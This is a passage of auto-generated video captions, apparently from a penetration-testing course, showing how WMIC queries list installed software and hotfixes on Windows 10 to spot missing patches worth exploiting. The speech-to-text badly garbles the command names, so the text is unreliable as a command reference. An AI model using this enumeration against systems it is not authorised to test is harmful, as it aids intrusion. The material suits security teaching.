But if you're on a different system or if you have some stuff installed that you put on yourself, you

375
00:27:39,700 --> 00:27:46,420
w animacy and then product, and then we're going to put it and we're going to tell them the columns

376
00:27:46,420 --> 00:27:52,580
that we want to see what name, version and vendor and then we just enter.

377
00:27:52,600 --> 00:27:56,080
So there's no instances because I didn't have installed anything on this box.

378
00:27:56,980 --> 00:28:02,980
Another thing we do is look at some updates like no what system, what updates were installed and when

379
00:28:02,980 --> 00:28:06,580
were they installed so we could do that amici command again.

380
00:28:07,210 --> 00:28:10,660
And then we're going to CUFI and then another command.

381
00:28:10,900 --> 00:28:15,570
And now once again, we're going to tell it what columns we actually wanted to display so we can do

382
00:28:15,580 --> 00:28:19,060
caption description.

383
00:28:20,550 --> 00:28:27,570
Then we do hotfix idea and then is stalled on on.

384
00:28:29,670 --> 00:28:36,120
It was on the air and it's going to tell us, hey, these security updates are installed.

385
00:28:36,160 --> 00:28:37,690
This is when it was installed.

386
00:28:37,930 --> 00:28:43,120
So it gives us an idea of what kind of patches, you know, the system has and doesn't have.

387
00:28:43,300 --> 00:28:48,100
And you can start to look online and try to figure out, you know, what you might be able to take advantage

388
00:28:48,100 --> 00:28:48,190
of.

389
00:28:48,340 --> 00:28:51,630
Maybe it's missing a security patch for like a major vulnerability.

390
00:28:51,640 --> 00:28:53,420
You can go ahead and try to take advantage of that.

391
00:28:53,710 --> 00:29:00,340
So that's like some basic enumeration for, like trying to find some vulnerable things in Windows 10.